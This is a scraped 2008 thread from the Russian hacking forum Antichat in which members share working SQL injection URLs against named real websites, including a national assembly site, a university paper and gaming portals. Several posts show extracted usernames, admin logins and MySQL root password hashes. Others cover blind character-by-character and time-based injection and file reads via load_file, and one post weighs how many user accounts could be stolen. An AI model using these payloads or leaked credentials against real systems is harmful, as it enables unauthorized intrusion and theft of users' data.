Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
30.04.2008, 20:20
|
|
Познающий
Регистрация: 06.04.2007
Сообщений: 77
Провел на форуме:
1062869
Репутация:
136
|
|
Сайт:www.bazarinfo.com
Инфа: Газета объявлений
SQL-Inj:
Код:
http://www.bazarinfo.com/view.php?page=1&id=-14+union+select+1,2,3,4,5,6,7,8,9/*
---------------------------------------------------------------
Сайт: www.nationalassembly.af
Инфа: Национальная асамблея Авганистана.
SQL-Inj:
Код:
http://www.nationalassembly.af/index.php?id=99+union+select+version(),2,3,4,5,6,7,8--
Ну и так Скули на некоторых сайтах,небыло времени их раскрутить.
Код HTML:
http://www.script.com.ua/comments.php?s=news&id=115'
http://www.g-models.com/foto.php?id=1'+order+by+1/*&i=6
http://www.desktopsidebar.com/ffdetails.php?id=161'+order+by+14/*
|
|
|
30.04.2008, 20:42
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://www.sticker.su/forum.php?sub_topics=true&main_topic_id=1'+union+s elect+concat_ws(0x3a,login,password,email),2,3,4+f rom+forum_users+limit+1,1/*
Не наю, было это или нет,чел нашёл уязвимый сайт:Р.Ни могу понять,почему пишет,что количество столбцов левое, ибо ордер бай выдаёт 4 о_О.Таблицу и поля вручную подогнал.Мошь выведет кто о_О.
|
|
|
|
30.04.2008, 22:36
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
dailybeacon.utk.edu
Код:
http://dailybeacon.utk.edu/showarticle.php?articleid=999999999/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12/**/from/**/mysql.user/*
root:49c206e707168c98 |
|
|
|
01.05.2008, 02:00
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753
Репутация:
552
|
|
Код:
http://www.gamershood.com/game.php?id=769+and+1=2+union+all+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+user+where+userid=21000--
|
|
|
|
01.05.2008, 09:09
|
|
Участник форума
Регистрация: 19.01.2008
Сообщений: 111
Провел на форуме:
769380
Репутация:
73
|
|
_http://oke.ru/xo4u.php?id=-42708'+union+select+1,2,3,4,5,6,7,8,9,10/*
|
|
|
|
01.05.2008, 15:31
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
Помогите с иньекцией ниче не получаеться http://hhunt.ru/comments.php?news_id=9999+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14/*
|
|
|
|
01.05.2008, 16:41
|
|
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме:
1266776
Репутация:
93
|
|
http://www.atrium-centr.ru/ncatalog/?id=80&position=-1078+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,concat_ws(0x2,version(),data base(),user()),23,24--
version: 4.0.24_Debian-10sarge1
bd: atrium
user: root@localhost
admin: login: admin
pass_hash: 74aff5cad73b7d1b587fe5a4fe5288d8
mysql.user:
1. root 001c591f0180a0db
2. root 404a5bc542945739
3. sys 42317d1c50e8dbb6
Последний раз редактировалось .acme; 01.05.2008 в 16:44..
|
|
|
|
02.05.2008, 01:00
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Код:
http://www.vlankas.ru/~bark/modules/myarticles/topics.php?op=listarticles&topic_id=-2%20union%20select%201,2,concat_ws(0x3a,uname,pass),4,5,6%20from%20runcms_users+limit+0,1
itman:bfc4c35ff54e5ff14f899eaf0b312d0c
Код:
http://www.cumaroua.net/index.php?option=com_jooget&Itemid=1&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*
admin:dc85333ba761e84fc1becd24397ba39e |
|
|
|
02.05.2008, 11:30
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
краткий обзор багов гохи:
1) посимвольный брут с этого нс:
Код:
http://wow.ru/c/pagecont/?id=2241+and+ascii(lower(substring(user(),4,1)))%3C=97
Код:
1-103 g
2-111 o
3-104 h
4-97 a
5-95 _
6-103 g
7-111 o
8-104 h
9-97 a
10-115 s
11-64 @
12 49 1
...
2)reverse-ip=>
Код:
http://news.goha.ru/c/pagecont/?id=2217+order+by+4/*
-//-
3)однако, есть и не посимвольный брут, причем где то ковычки фильтруются:
Код:
http://eq2.goha.ru/c/pagecat/show_image/?action=show_image&id=999+union+select+load_file('/lala'),2,3,4+from+information_schema.tables/*
4).. а где то нет:
Код:
http://www.list.goha.ru/suggest-link.php?id=0'+union+select+1,load_file('/lala'),3,4,5,6,7,8,9,10,11,12,13,14,15/*
или даже так (вывод в исходниках):
Код:
http://eq2.goha.ru/c/pagecat/show_image/?action=show_image&id=999+union+select+concat(0x3b,table_name,table_schema),2,3,4+from+information_schema.tables/*
6)причем бага с посимвольным брутом распостранена на нескольких ресурсах гохи:
Код:
http://lineage2.ru/c/pagecont/?id=2761-1
сколько акков с оффа можно увести, получив доступ к личкам пользователей - решать вам, и помните о неправомерном доступе к закрытой информации=). |
|
|
|
02.05.2008, 20:16
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Лично меня с лайнэйдж редиректит =)
http://lineage2.ru/c/pagecont/?id=2760+and+substring(version(),1,1)=5
А вот:Р
http://lineage2.ru/c/pagecont/?id=2760+or+2760=if(ascii((select+user()))>=254,1, 0,benchmark(2999999,md5(now()))
Если вместо 254 вписать 280 или больше всё равно возвращает 1,или запрос непральный,бес понятия)
http://lineage2.ru/c/pagecont/?id=2760+order+by+4/*
http://lineage2.ru/c/pagecont/?id=2760+union+select+1,2,3,4/*
Фильтрация или запрос неверный)
http://lineage2.ru/c/pagecont/?id=2760+union+select+0x277461626C655F6E616D6527,2 ,3,4+0x66726F6D+information_schema.tables/*
Чойто не выходит: )
Последний раз редактировалось Велемир; 02.05.2008 в 21:23..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
